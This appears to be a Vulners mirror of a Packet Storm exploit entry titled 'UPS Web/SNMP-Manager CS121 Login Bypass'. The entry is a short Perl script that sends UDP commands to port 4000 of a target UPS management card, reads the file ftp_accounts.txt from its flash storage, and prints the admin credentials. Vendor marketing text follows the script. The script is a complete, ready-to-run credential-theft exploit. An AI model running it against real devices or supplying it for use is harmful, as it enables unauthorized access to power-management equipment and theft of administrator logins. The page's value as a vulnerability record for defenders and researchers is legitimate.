Lucene search
K

UPS Web/SNMP-Manager CS121 Login Bypass

🗓️ 17 May 2014 00:00:00Reported by jkmacType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

UPS Web/SNMP-Manager CS121 Login Bypas

Code
`#!/usr/bin/perl -w  
use IO::Socket;   
use constant MAXBYTES => scalar 1024;   
  
$socket = IO::Socket::INET->new( PeerPort => 4000,  
PeerAddr => $ARGV[0],  
Type => SOCK_DGRAM,  
Proto => 'udp');  
  
$socket->send("<VERSION>");  
$socket->recv($inline, MAXBYTES);  
print "UPS: $inline \n";   
  
$socket->send("show syspar");  
$socket->recv($inline, MAXBYTES);  
print "$inline\n";  
  
print "Searching login\n" ;   
$socket->send("start");  
$socket->recv($inline, MAXBYTES);  
$socket->send("cd /flash");  
$socket->send("type ftp_accounts.txt");   
  
while($socket->recv($inline, MAXBYTES)) {   
if($inline =~ /admin/ig) { print $inline; exit; }  
}  
  
sleep(1);  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation